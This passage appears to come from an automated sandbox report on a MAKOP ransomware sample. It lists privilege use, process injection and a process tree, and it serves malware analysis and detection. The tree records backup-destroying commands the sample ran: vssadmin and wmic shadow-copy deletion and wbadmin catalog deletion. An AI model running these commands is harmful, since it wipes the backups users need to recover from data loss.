N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2656 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2656 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2656 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2656 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2656 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2656 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2656 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2656 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2656 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1392 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

